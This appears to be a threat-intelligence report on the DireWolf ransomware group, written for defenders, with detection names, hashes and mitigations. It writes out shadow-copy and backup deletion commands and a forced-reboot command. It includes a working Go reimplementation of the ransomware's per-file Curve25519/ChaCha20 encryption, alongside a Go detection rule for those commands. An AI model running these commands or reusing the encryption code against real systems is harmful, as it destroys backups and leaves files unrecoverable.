Threat Overview
We have identified a new threat report published by CyberHunter_NL on September 3, 2025. The report details the activities of the DireWolf ransomware group, which has been targeting businesses across Asia and Australia since May 2025. This group employs a double extortion technique, encrypting data and threatening to leak it unless a ransom is paid.
Dire Wolf Ransomware Group
The DireWolf ransomware group emerged in May 2025 and disclosed their first six victims on a darknet leak site on May 26 of the same year. Their primary goal is financial gain, and they contact victims through the Tox messenger. The group targets various industries, including manufacturing, IT, construction, and finance, across multiple regions such as Asia, Australia, Italy, and others.
Analysis Details
DireWolf takes its settings from command-line arguments rather than a configuration file; -d specifies the directory to encrypt and -h prints usage. After parsing the arguments, the malware takes a system-wide mutex so that a second instance cannot run alongside the first.
Once that check passes, DireWolf runs its pre-processing routine and, after a 2-second delay, sets up a worker pool. The pool size is held in a global variable, and the malware spawns eight goroutines per logical CPU to encrypt files concurrently. This maximises throughput at the cost of a sharp rise in CPU usage and disk queue length, which shows up as a noticeable slowdown on the host.
The ransomware uses several anti-recovery techniques: self-deletion, clearing of event logs, and removal of backup data. It forcibly terminates processes belonging to databases (MSSQL, Oracle), mail servers (Exchange), virtualization platforms (VMware), backup software (Veeam, Veritas Backup Exec), and security products (Symantec, Sophos). Killing these releases file locks on databases and mailboxes so they can be encrypted, and leaves no running backup or security agent to interfere with the attack or restore data.
DireWolf also stops specific services, including BackupExecJobEngine, SQLSERVERAGENT, wuauserv, VeeamTransportSvc and MSExchangeIS, leaving backup, update and security functions inoperative. It then deletes Volume Shadow Copies and Windows Server Backup data with commands such as vssadmin delete shadows /all /quiet and wbadmin delete backup -keepVersions:0 -quiet. Both commands are rare in normal administration and appear in process-creation telemetry, which makes them a high-fidelity detection point; service stops performed through the service control API rather than a net stop command leave no such event and are better caught from Service Control Manager entries in the System log.
For each file, DireWolf generates a random Curve25519 private key and performs a key exchange against the public key hard-coded in the binary. The shared secret is hashed with SHA-256 to derive the ChaCha20 key and nonce, and the file content is then encrypted with the ChaCha20 stream cipher, chosen for its speed on large volumes of data. Because the per-file private key is discarded after use and the private key matching the embedded public key exists only with the operator, the victim cannot recompute the shared secret and therefore cannot recover the file key.
Files smaller than 1 MB are encrypted in full; larger files have only their first 1 MB encrypted. This trades completeness for speed so that as many files as possible are hit before the attack is noticed. For large files it also means everything past the first megabyte remains in clear: the lost header usually makes the file unusable in its application, but the remaining content can still be carved from the encrypted file, and it may contain sensitive data relevant to the leak threat.
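The per-file scheme described in the two paragraphs above, written out as an added example in Go, the language DireWolf itself is written in. This is illustrative code, not DireWolf's own: it uses crypto/ecdh from the Go standard library (Go 1.20 or later) for X25519 and a compact RFC 8439 ChaCha20 written here because the standard library has none, and it assumes a header layout that stores the per-file public value beside the ciphertext and a particular split of the SHA-256 output into key and nonce, neither of which the report specifies:

```go
package main

import (
	"crypto/ecdh"
	"crypto/rand"
	"crypto/sha256"
	"encoding/binary"
	"fmt"
	"math/bits"
)

// Only the leading chunkLimit bytes of a file are encrypted; smaller files in full.
const chunkLimit = 1 << 20

// encryptedFile is a layout assumed by this example (the report does not give DireWolf's):
// the per-file ephemeral public value has to travel with the ciphertext, or not even the
// operator could decrypt it.
type encryptedFile struct{ EphemeralPub, Body []byte }

// newKeyPair generates a Curve25519 key pair with crypto/rand (per-file ephemeral key
// here; in main it also stands in for the operator's key pair).
func newKeyPair() (*ecdh.PrivateKey, error) { return ecdh.X25519().GenerateKey(rand.Reader) }

// deriveKeyNonce hashes the X25519 shared secret with SHA-256 as the report says;
// how the result is split into key and nonce is this example's assumption.
func deriveKeyNonce(shared []byte) (key [32]byte, nonce [12]byte) {
	key = sha256.Sum256(shared)
	n := sha256.Sum256(append(append([]byte{}, shared...), 'n'))
	copy(nonce[:], n[:12])
	return key, nonce
}

// applyKeystream encrypts or decrypts (ChaCha20 is symmetric) the leading chunk only.
func applyKeystream(shared, data []byte) []byte {
	key, nonce := deriveKeyNonce(shared)
	out := append([]byte{}, data...)
	n := len(out)
	if n > chunkLimit { n = chunkLimit }
	copy(out, chachaXOR(key, nonce, out[:n]))
	return out
}

// encryptFile: fresh Curve25519 key pair per file, X25519 against the operator's hard-coded
// public key. The ephemeral private half is dropped on return, so afterwards only the
// operator's private key can recompute the shared secret.
func encryptFile(operatorPub *ecdh.PublicKey, plaintext []byte) (encryptedFile, error) {
	eph, err := newKeyPair()
	if err != nil { return encryptedFile{}, err }
	shared, err := eph.ECDH(operatorPub)
	if err != nil { return encryptedFile{}, err }
	return encryptedFile{eph.PublicKey().Bytes(), applyKeystream(shared, plaintext)}, nil
}

// decryptFile is the operator-side decryptor; a victim holds only the public key.
func decryptFile(operatorPriv *ecdh.PrivateKey, ef encryptedFile) ([]byte, error) {
	pub, err := ecdh.X25519().NewPublicKey(ef.EphemeralPub)
	if err != nil { return nil, err }
	shared, err := operatorPriv.ECDH(pub)
	if err != nil { return nil, err }
	return applyKeystream(shared, ef.Body), nil
}

// ChaCha20 per RFC 8439 (32-byte key, 12-byte nonce, 32-bit block counter),
// written out here because the Go standard library does not ship it.
func quarterRound(s *[16]uint32, a, b, c, d int) {
	s[a] += s[b]; s[d] ^= s[a]; s[d] = bits.RotateLeft32(s[d], 16)
	s[c] += s[d]; s[b] ^= s[c]; s[b] = bits.RotateLeft32(s[b], 12)
	s[a] += s[b]; s[d] ^= s[a]; s[d] = bits.RotateLeft32(s[d], 8)
	s[c] += s[d]; s[b] ^= s[c]; s[b] = bits.RotateLeft32(s[b], 7)
}

func chachaBlock(key [32]byte, nonce [12]byte, counter uint32) [64]byte {
	s := [16]uint32{0x61707865, 0x3320646e, 0x79622d32, 0x6b206574}
	for i := 0; i < 8; i++ { s[4+i] = binary.LittleEndian.Uint32(key[4*i:]) }
	s[12] = counter
	for i := 0; i < 3; i++ { s[13+i] = binary.LittleEndian.Uint32(nonce[4*i:]) }
	w := s
	for i := 0; i < 10; i++ { // 20 rounds: 10 column/diagonal double rounds
		quarterRound(&w, 0, 4, 8, 12); quarterRound(&w, 1, 5, 9, 13)
		quarterRound(&w, 2, 6, 10, 14); quarterRound(&w, 3, 7, 11, 15)
		quarterRound(&w, 0, 5, 10, 15); quarterRound(&w, 1, 6, 11, 12)
		quarterRound(&w, 2, 7, 8, 13); quarterRound(&w, 3, 4, 9, 14)
	}
	var out [64]byte
	for i := range w { binary.LittleEndian.PutUint32(out[4*i:], w[i]+s[i]) }
	return out
}

// chachaXOR XORs data with the keystream, starting at block counter 0.
func chachaXOR(key [32]byte, nonce [12]byte, data []byte) []byte {
	out := make([]byte, len(data))
	for off, ctr := 0, uint32(0); off < len(data); off, ctr = off+64, ctr+1 {
		ks := chachaBlock(key, nonce, ctr)
		for i := 0; i < 64 && off+i < len(data); i++ { out[off+i] = data[off+i] ^ ks[i] }
	}
	return out
}

func main() {
	operator, _ := newKeyPair()          // stands in for the operator's key pair
	doc := make([]byte, chunkLimit+1000) // constructed "file" just over 1 MB
	ef, _ := encryptFile(operator.PublicKey(), doc)
	back, _ := decryptFile(operator, ef)
	fmt.Println("tail left in clear:", string(ef.Body[chunkLimit:]) == string(doc[chunkLimit:]),
		"operator recovers file:", string(back) == string(doc))
}
```

Running it reports that the bytes beyond 1 MB are unchanged and that the operator's key recovers the file. The point for defenders is that the victim machine only ever holds the public key, each file's private key is thrown away immediately after the exchange, and without the operator's private key the shared secret cannot be recomputed, so a decryptor has to come from the operator or from a flaw in the implementation, not from the cipher.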
Post-Encryption Activities
After encryption, DireWolf writes a marker file recording completion and schedules a forced reboot with shutdown -r -f -t 10, leaving users about ten seconds to react. Whether or not the reboot succeeds, the malware then runs its self-deletion routine, so the binary is often gone by the time responders arrive and samples have to be recovered from EDR quarantine or captured memory rather than from disk.
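The command lines named above (vssadmin delete shadows, wbadmin delete backup, the service stops, and shutdown -r -f -t 10) all appear in process-creation telemetry. The following is an added example, not code from the report or from AhnLab, of matching them and correlating backup destruction with a forced reboot on the same host; the event format, field names and log lines are constructed for the example and are assumed to be in time order:

```go
package main

import (
	"bufio"
	"encoding/json"
	"fmt"
	"path"
	"strings"
	"time"
)

// procEvent is a minimal process-creation record; the field names are this example's
// own (map Sysmon Event ID 1 or your EDR's fields onto them).
type procEvent struct {
	Host    string    `json:"host"`
	Time    time.Time `json:"time"`
	CmdLine string    `json:"cmdline"`
}

// Services the report lists DireWolf stopping, lower-cased for matching.
var watchedServices = map[string]bool{
	"backupexecjobengine": true, "sqlserveragent": true, "wuauserv": true,
	"veeamtransportsvc": true, "msexchangeis": true,
}

// Constructed sample telemetry, not real logs, already in time order: FS01 shows the
// sequence from the report, WS07 benign look-alikes that must not fire.
const sampleLog = `{"host":"FS01","time":"2025-09-03T10:15:02Z","cmdline":"C:\\Windows\\System32\\vssadmin.exe delete shadows /all /quiet"}
{"host":"FS01","time":"2025-09-03T10:15:03Z","cmdline":"wbadmin delete backup -keepVersions:0 -quiet"}
{"host":"FS01","time":"2025-09-03T10:15:05Z","cmdline":"net stop VeeamTransportSvc /y"}
{"host":"FS01","time":"2025-09-03T10:19:40Z","cmdline":"shutdown -r -f -t 10"}
{"host":"WS07","time":"2025-09-03T10:20:00Z","cmdline":"shutdown -r -t 3600"}
{"host":"WS07","time":"2025-09-03T10:21:00Z","cmdline":"vssadmin list shadows"}`

// parseEvents reads JSON lines, skipping malformed ones.
func parseEvents(log string) []procEvent {
	var evs []procEvent
	sc := bufio.NewScanner(strings.NewReader(log))
	for sc.Scan() {
		var e procEvent
		if err := json.Unmarshal(sc.Bytes(), &e); err == nil { evs = append(evs, e) }
	}
	return evs
}

// has reports whether any of words occurs as a whole token of fields.
func has(fields []string, words ...string) bool {
	for _, f := range fields {
		for _, w := range words { if f == w { return true } }
	}
	return false
}

// classify returns the rule names one command line trips (case-insensitive; the
// program name is matched without its path or .exe suffix).
func classify(cmd string) []string {
	f := strings.Fields(strings.ToLower(cmd))
	if len(f) == 0 { return nil }
	exe := strings.TrimSuffix(path.Base(strings.ReplaceAll(strings.Trim(f[0], `"`), `\`, "/")), ".exe")
	var hits []string
	switch exe {
	case "vssadmin":
		if has(f, "delete") && has(f, "shadows") { hits = append(hits, "vssadmin_delete_shadows") }
	case "wbadmin":
		if has(f, "delete") && has(f, "backup", "catalog") { hits = append(hits, "wbadmin_delete_backup") }
	case "shutdown": // -f forces applications closed; the -t value is left to triage
		if has(f, "-r", "/r") && has(f, "-f", "/f") { hits = append(hits, "forced_reboot") }
	case "net", "net1", "sc":
		if len(f) > 2 && f[1] == "stop" && watchedServices[f[2]] { hits = append(hits, "stop_backup_or_security_service") }
	}
	return hits
}

// correlate raises one alert per host where backup destruction is followed by a
// forced reboot within window: the tail of the sequence the report describes.
func correlate(evs []procEvent, window time.Duration) []string {
	lastDestroy, alerted := map[string]time.Time{}, map[string]bool{}
	var alerts []string
	for _, e := range evs {
		for _, r := range classify(e.CmdLine) {
			switch r {
			case "vssadmin_delete_shadows", "wbadmin_delete_backup":
				lastDestroy[e.Host] = e.Time
			case "forced_reboot":
				if t, ok := lastDestroy[e.Host]; ok && e.Time.Sub(t) <= window && !alerted[e.Host] {
					alerted[e.Host] = true
					alerts = append(alerts, fmt.Sprintf("%s: backup destruction at %s, forced reboot at %s",
						e.Host, t.Format(time.RFC3339), e.Time.Format(time.RFC3339)))
				}
			}
		}
	}
	return alerts
}

func main() {
	evs := parseEvents(sampleLog)
	for _, e := range evs {
		for _, r := range classify(e.CmdLine) { fmt.Printf("%s %-34s %s\n", e.Host, r, e.CmdLine) }
	}
	for _, a := range correlate(evs, 10*time.Minute) { fmt.Println("ALERT", a) }
}
```

On the sample, FS01 trips all four rules and raises one correlated alert; WS07's scheduled reboot without -f and its vssadmin list command stay quiet. The net stop rule only sees service stops issued through a command: a service stopped through the service control API produces no process-creation event and is better caught from the Service Control Manager "entered the stopped state" entries in the System log. The 10-minute window is a starting point to tune against your own telemetry.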
Conclusion
Despite being a new group, DireWolf poses a significant threat to organizations across a range of industries. Its combination of a per-file Curve25519 key exchange with ChaCha20 encryption leaves files undecryptable without the operator's private key, and its anti-recovery and anti-analysis measures, terminating backup processes, deleting shadow copies and clearing event logs, are designed to remove every other route to recovery.
AhnLab’s Response
AhnLab product detection names for DireWolf ransomware:
- V3: Malware/Win.Generic.C5380825, Ransom/MDP.Delete.M2117, Ransom/MDP.Command.M1751, Ransom/MDP.Behavior.M2813, Ransom/MDP.Decoy.M1171, Ransom/MDP.Event.M1946
- EDR: SystemManipulation/EDR.Event.M2486, SystemManipulation/EDR.Event.M1751, Ransom/EDR.Decoy.M2470, Ransom/MDP.Event.M1946
The MD5 hashes associated with this threat are: 333fd9dd9d84b58c4eef84a8d07670dd, 44da29144b151062bce633e9ce62de85, aa62b3905be9b49551a07bc16eaad2ff, bc6912c853be5907438b4978f6c49e43.
Recommendations
To mitigate the risks posed by DireWolf ransomware:
- Keep backups offline or immutable and test restores regularly; DireWolf stops backup services and deletes shadow copies and Windows Server Backup data, so any backup reachable from the infected host should be assumed lost.
- Regularly update and patch systems to close known vulnerabilities.
- Deploy endpoint detection and response tooling and alert on vssadmin delete shadows, wbadmin delete backup, forced reboots (shutdown with -r -f and a short timer), and bulk termination of database, mail, backup and security services.
- Educate employees to recognize and report phishing and other social engineering attempts.